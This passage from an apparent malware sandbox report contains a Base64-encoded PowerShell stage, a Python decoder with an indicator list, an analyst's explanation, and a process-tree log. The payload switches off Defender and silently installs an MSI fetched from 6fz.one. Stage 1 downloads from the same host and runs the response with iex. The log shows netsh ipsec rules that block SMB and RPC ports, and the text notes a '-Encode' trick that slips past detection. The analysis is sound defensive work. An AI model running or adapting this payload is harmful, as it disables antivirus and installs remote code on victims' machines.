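DQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAG UAIAAtAEQAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdA
BvAHIAaQBuAGcAIAAkAHQAcgB1AGUADQAKAEEAZABkAC0ATQBwAFAAcgBlAG YAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIA
AiACQAZQBuAHYAOgB3AGkAbgBkAGkAcgAiAA0ACgAkAFIAZQBnAGsAZQB5AH AAYQB0AGgAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXA
A3AC0AWgBpAHAAIgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAE QAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQ
BzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAG EAZwBuAG8AcwB0AGkAYwBzADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQ
BtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAG MAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQ
BzAHMAIABQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAA0ACgB7AA 0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALA
AgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF 0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbg
AgAGkAbgB0ACAATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0AC gAcwB0AHIAaQBuAGcAIABwAGEAYwBrAGEAZwBlAFAAYQB0AGgALAAgAHMAdA
ByAGkAbgBnACAAYwBvAG0AbQBhAG4AZABMAGkAbgBlACkAOwANAAoAWwBEAG wAbABJAG0AcABvAHIAdAAoACIAbQBzAGkALgBkAGwAbAAiACkAXQANAAoAcA
B1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAH QAIABNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAaQBuAHQAIA
BkAHcAVQBJAEwAZQB2AGUAbAAsACAASQBuAHQAUAB0AHIAIABwAGgAVwBuAG QAKQA7AA0ACgB9AA0ACgAiAEAADQAKAGQAbwANAAoAewANAAoAJABtAHMAaQ
BwAGEAdABoAEEAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8ANgBmAHoALgBvAG 4AZQAvAGQALgBwAGgAcAA/AGkAPQAxADYAIgANAAoAJABtAHMAaQBwAGEAdA
BoAEEATABMACAAPQAgAEAAKAAiACQAbQBzAGkAcABhAHQAaABBACIALAAiAC QAbQBzAGkAcABhAHQAaABBACIAKQANAAoAJABOAGQAUwBVAEkAdwB1AHUAVw
BuAHAAWQBIAHoARgB1ACAAPQAgAGcAZQB0AC0AcgBhAG4AZABvAG0AIAAkAG 0AcwBpAHAAYQB0AGgAQQBMAEwAOwANAAoAWwBQAEYAOAA4AGQATgBjAGQAcw
BEAEQAcQBlADcAWgBmAF0AOgA6AE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAG EAbABVAEkAKAAyACwAMAApADsADQAKAFsAUABGADgAOABkAE4AYwBkAHMARA
BEAHEAZQA3AFoAZgBdADoAOgBNAHMAaQBJAG4AcwB0AGEAbABsAFAAcgBvAG QAdQBjAHQAKAAiACQATgBkAFMAVQBJAHcAdQB1AFcAbgBwAFkASAB6AEYAdQ
AiACwAIgAiACkADQAKAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADYAMAANAA oAfQANAAoAdQBuAHQAaQBsACAAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcA
BlAHIAdAB5ACAALQBQAGEAdABoACAAJABSAGUAZwBrAGUAeQBwAGEAdABoAC AALQBuAGEAbQBlACAAUwB0AGEAeQBPAG4AVABvAHAAKQANAAoA
"""


def strip_b64(wrapped: str) -> str:
    """Remove whitespace that report rendering inserted and restore '=' padding."""
    clean = re.sub(r"\s+", "", wrapped)
    return clean + "=" * (-len(clean) % 4)


def decode_encoded_command(wrapped_b64: str) -> str:
    """powershell.exe -EncodedCommand expects Base64 of UTF-16LE, so decode as such."""
    raw = base64.b64decode(strip_b64(wrapped_b64))
    return raw.decode("utf-16-le", errors="replace")


URL_RE = re.compile(r"https?://[^\s'\"()]+")


def extract_urls(script: str) -> list:
    """Unique URLs in the decoded script, sorted for stable output."""
    return sorted(set(URL_RE.findall(script)))


# Substrings worth flagging in a decoded script; this list is the example's own assumption.
INDICATORS = (
    "Set-MpPreference -DisableRealtimeMonitoring",
    "Add-MpPreference -ExclusionPath",
    'DllImport("msi.dll"',
    "MsiInstallProduct",
    "downloadstring(",
    "iex(",
)


def find_indicators(script: str) -> list:
    """Case-insensitive match of INDICATORS against the decoded script."""
    low = script.lower()
    return [i for i in INDICATORS if i.lower() in low]


if __name__ == "__main__":
    for name, b64 in (("stage 1 (PID 4996)", STAGE1_B64), ("stage 2 (PID 900)", STAGE2_B64)):
        script = decode_encoded_command(b64)
        print(f"== {name} ==\n{script.strip()}")
        print("URLs:", extract_urls(script))
        print("Indicators:", find_indicators(script), "\n")
```

Decoding confirms what the process tree shows. Stage 1 (PID 4996) loops up to 100 times, fetches https://6fz.one/d.php?i=1 with (new-object net.webclient).downloadstring and passes the response to iex, then calls MsiMake (not defined in this script, so presumably defined by the downloaded text) and sleeps 30 seconds. Stage 2 (PID 900) runs Set-MpPreference -DisableRealtimeMonitoring $true and Add-MpPreference -ExclusionPath "$env:windir", uses Add-Type to compile a P/Invoke wrapper for MsiSetInternalUI and MsiInstallProduct in msi.dll (which is why csc.exe PID 372 and cvtres.exe PID 1496 appear as descendants of PID 900), then loops calling MsiSetInternalUI(2,0) (INSTALLUILEVEL_NONE, a silent install) and MsiInstallProduct("https://6fz.one/d.php?i=16","") every 60 seconds until HKCU:\Software\7-Zip has a StayOnTop value. The msiexec.exe -Embedding processes that follow are consistent with that Windows Installer activity. Note that -Encode in the stage 1 command line is accepted by powershell.exe as an unambiguous prefix of -EncodedCommand, so detection logic keyed on the literal string -EncodedCommand misses it.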

Analysis Process: csc.exe PID: 372 Parent PID: 900

General

Start time: 05:29:14 Start date: 24/08/2021 Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Wow64 process (32bit): true Commandline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjp55l32\hjp55l32.cmdline' Imagebase: 0x2f0000 File size: 2170976 bytes MD5 hash: 350C52F71BDED7B99668585C15D70EEA Has elevated privileges: true Has administrator privileges: true Programmed in: .Net C# or VB.NET Reputation: moderate

File Activities

File Created

File Deleted

File Written

File Read

Analysis Process: cvtres.exe PID: 1496 Parent PID: 372

General

Start time: 05:29:16 Start date: 24/08/2021 Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Wow64 process (32bit): true Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES2CD4.tmp' 'c:\Users\user\AppData\Local\Temp\hjp55l32\CSC19AB26A2AE5E4078BE27BAEBF17BEA80.TMP' Imagebase: 0x200000 File size: 43176 bytes MD5 hash: C09985AE74F0882F208D75DE27770DFA Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: moderate

File Activities

Analysis Process: msiexec.exe PID: 1064 Parent PID: 4552

General

Start time: 05:29:21 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\msiexec.exe Wow64 process (32bit): true Commandline: C:\Windows\syswow64\MsiExec.exe -Embedding B689D01F43C91B84ED8BE4676C8E722B Imagebase: 0xa40000 File size: 59904 bytes MD5 hash: 12C17B5A5C2A7B97342C362CA467E9A2 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Analysis Process: msiexec.exe PID: 5248 Parent PID: 4552

General

Start time: 05:29:24 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\msiexec.exe Wow64 process (32bit): true Commandline: C:\Windows\syswow64\MsiExec.exe -Embedding 8A139D1F2E341CAE02DE3AE4A26DCC8A E Global\MSI0000 Imagebase: 0xa40000 File size: 59904 bytes MD5 hash: 12C17B5A5C2A7B97342C362CA467E9A2 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

File Activities

Registry Activities

Analysis Process: netsh.exe PID: 4860 Parent PID: 5248

General

Start time: 05:29:25 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' interface ipv6 install Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Analysis Process: conhost.exe PID: 5144 Parent PID: 4860

General

Start time: 05:29:27 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language Reputation: high

Analysis Process: netsh.exe PID: 1692 Parent PID: 5248

General

Start time: 05:29:28 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add policy name=qianye Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 2596 Parent PID: 1692

General

Start time: 05:29:28 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5744 Parent PID: 5248

General

Start time: 05:29:29 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filterlist name=Filter1 Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 5876 Parent PID: 5744

General

Start time: 05:29:29 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5968 Parent PID: 5248

General

Start time: 05:29:30 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 6008 Parent PID: 5968

General

Start time: 05:29:30 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 6032 Parent PID: 5248

General

Start time: 05:29:31 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 6036 Parent PID: 6032

General

Start time: 05:29:31 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 6096 Parent PID: 5248

General

Start time: 05:29:32 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 6068 Parent PID: 6096

General

Start time: 05:29:33 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 4072 Parent PID: 5248

General

Start time: 05:29:33 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 476 Parent PID: 4072

General

Start time: 05:29:34 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5616 Parent PID: 5248

General

Start time: 05:29:34 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 1496 Parent PID: 5616

General

Start time: 05:29:35 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 4568 Parent PID: 5248

General

Start time: 05:29:35 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 1844 Parent PID: 4568

General

Start time: 05:29:36 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 896 Parent PID: 5248

General

Start time: 05:29:36 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 340 Parent PID: 896

General

Start time: 05:29:37 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 4968 Parent PID: 5248

General

Start time: 05:29:37 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 2072 Parent PID: 4968

General

Start time: 05:29:38 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 2596 Parent PID: 5248

General

Start time: 05:29:38 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 5780 Parent PID: 2596

General

Start time: 05:29:39 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 4864 Parent PID: 5248

General

Start time: 05:29:40 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 5972 Parent PID: 4864

General

Start time: 05:29:40 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5916 Parent PID: 5248

General

Start time: 05:29:41 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 6056 Parent PID: 5916

General

Start time: 05:29:41 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5296 Parent PID: 5248

General

Start time: 05:29:42 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 572 Parent PID: 5296

General

Start time: 05:29:42 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5040 Parent PID: 5248

General

Start time: 05:29:43 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 5264 Parent PID: 5040

General

Start time: 05:29:43 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 1752 Parent PID: 5248

General

Start time: 05:29:44 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 1036 Parent PID: 1752

General

Start time: 05:29:44 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 2436 Parent PID: 372

General

Start time: 05:29:45 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: false Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 3520 Parent PID: 5248

General

Start time: 05:29:45 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 2256 Parent PID: 3520

General

Start time: 05:29:45 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5228 Parent PID: 5248

General

Start time: 05:29:46 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 5440 Parent PID: 5228

General

Start time: 05:29:47 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5908 Parent PID: 5248

General

Start time: 05:29:47 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 5860 Parent PID: 5908

General

Start time: 05:29:48 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5880 Parent PID: 5248

General

Start time: 05:29:48 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add filteraction name=FilteraAtion1 action=block Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 6008 Parent PID: 5880

General

Start time: 05:29:49 Start date: 24/08/2021 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff7ecfc0000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: netsh.exe PID: 5240 Parent PID: 5248

General

Start time: 05:29:49 Start date: 24/08/2021 Path: C:\Windows\SysWOW64\netsh.exe Wow64 process (32bit): true Commandline: 'C:\Windows\SysWOW64\netsh.exe' ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1 Imagebase: 0x11f0000 File size: 82944 bytes MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807 Has elevated privileges: true Has administrator privileges: true Programmed in: C, C++ or other language

Analysis Process: conhost.exe PID: 4344 Parent PID: 5240

General

